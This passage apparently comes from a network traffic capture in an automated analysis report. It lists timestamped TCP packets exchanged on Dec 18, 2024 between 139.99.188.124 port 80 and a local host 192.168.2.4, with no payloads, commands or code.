                                                                              Dec 18, 2024 21:00:36.380084038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.380222082 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.382210016 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.382225990 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.382244110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.382277012 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.383173943 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.383188963 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.383375883 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.385312080 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.385329008 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.385417938 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.493455887 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.493482113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.493535995 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.494215965 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.495026112 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.495050907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.495064020 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.496714115 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.496732950 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.496756077 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.498264074 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.498282909 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.498327017 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.499888897 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.499907017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.499957085 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.501677036 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.501696110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.501748085 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.503365993 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.503384113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.503421068 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.504853010 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.504869938 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.504949093 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.506665945 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.506681919 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.506705046 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.508543015 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.508559942 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.508589983 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.510246038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.510265112 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.510282040 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.510313988 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.510339975 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.511982918 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.512001038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.512037992 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.513850927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.513869047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.513917923 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.515443087 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.515477896 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.515516043 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.517318964 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.517337084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.517353058 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.517389059 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.519184113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.519201994 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.519228935 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.520926952 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.520944118 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.520975113 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.522653103 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.522670984 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.522701025 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.524532080 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.524550915 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.524579048 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.526263952 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.526282072 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.526299000 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.526307106 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.526336908 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.528110981 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.528136015 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.528223991 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.529874086 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.529892921 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.529948950 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.531675100 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.531692982 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.531749964 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.533612967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.533629894 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.533644915 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.533669949 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.535217047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.535233974 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.535285950 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.537430048 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.537448883 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.537475109 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.538835049 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.538851976 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.538873911 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.540513992 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.540533066 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.540559053 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.542226076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.542243958 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.542258978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.542268991 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.542298079 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.544105053 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.544122934 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.544173002 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.545835972 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.545852900 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.545897007 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.547934055 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.547986031 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.548034906 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.549434900 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.549475908 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.549509048 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.549525976 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.551239967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.551296949 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.551347017 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.553153038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.553188086 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.553200006 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.554730892 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.554766893 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.554819107 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.556616068 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.556652069 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.556660891 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.558286905 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.558321953 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.558339119 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.558356047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.558397055 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.560240030 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.560275078 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.560323954 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.561955929 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.561992884 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.562069893 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.563688040 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.563724041 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.563765049 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.565491915 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.565527916 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.565560102 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.565566063 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.567406893 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.567441940 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.567457914 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.568974972 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.569022894 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.569025040 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.571166992 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.571201086 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.571213961 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.572575092 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.572608948 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.572623014 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.574414968 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.574450016 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.574471951 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.574482918 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.574935913 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.576132059 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.576167107 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.576208115 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.577876091 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.577913046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.577960968 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.685699940 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.685903072 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.685982943 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.686794043 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.687515020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.687582970 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.688322067 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.688963890 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.688999891 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.689104080 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.690977097 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.691030979 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.691124916 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.692219019 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.692254066 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.692285061 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.694174051 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.694207907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.694226027 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.695413113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.695446968 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.695456028 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.697370052 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.697410107 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.697421074 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.698966026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.699013948 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.699017048 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.700823069 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.700858116 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.700870037 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.705257893 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.705293894 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.705308914 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.705403090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.705490112 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.706831932 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.706868887 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.706903934 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.706937075 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.706944942 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.706974983 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.707937002 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.707988977 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.708045006 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.709698915 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.709760904 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.709796906 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.709825039 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.711397886 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.711436033 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.711447954 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.713171005 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.713210106 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.713226080 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.714998007 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.715034962 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.715054989 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.716912985 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.716948986 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.716959953 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.718508959 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.718547106 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.718563080 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.718583107 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.718631029 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.720288992 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.720345020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.720397949 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.722127914 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.722165108 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.722212076 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.723875999 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.723912001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.723965883 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.725764036 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.725822926 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.725858927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.725903034 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.727387905 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.727452040 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.727511883 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.729212046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.729249001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.729260921 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.731122971 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.731159925 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.731180906 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.732757092 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.732795000 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.732857943 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.734528065 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.734565020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.734576941 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.734599113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.734688044 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.736325979 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.736362934 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.736416101 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.738132000 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.738168001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.738214970 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.739950895 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.739986897 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.740058899 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.741660118 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.741695881 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.741729975 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.741744041 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.743480921 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.743521929 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.743530989 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.745374918 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.745409966 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.745424032 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.746984005 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.747020006 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.747030020 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.748786926 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.748823881 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.748872042 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.754163980 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.754199982 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.754221916 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.754234076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.754281044 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.756330967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.756366968 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.756427050 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.757894039 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.757929087 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.757994890 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.759193897 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.759247065 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.759283066 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.759304047 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.759336948 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.759371996 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.759421110 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.759478092 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.759514093 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.759546041 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.761270046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.761305094 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.761341095 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.763221025 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.763256073 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.763286114 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.765079021 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.765115023 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.765149117 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.766644001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.766680002 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.766714096 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.766732931 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.766757965 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.768394947 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.768430948 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.768477917 CET4975380192.168.2.4139.99.188.124
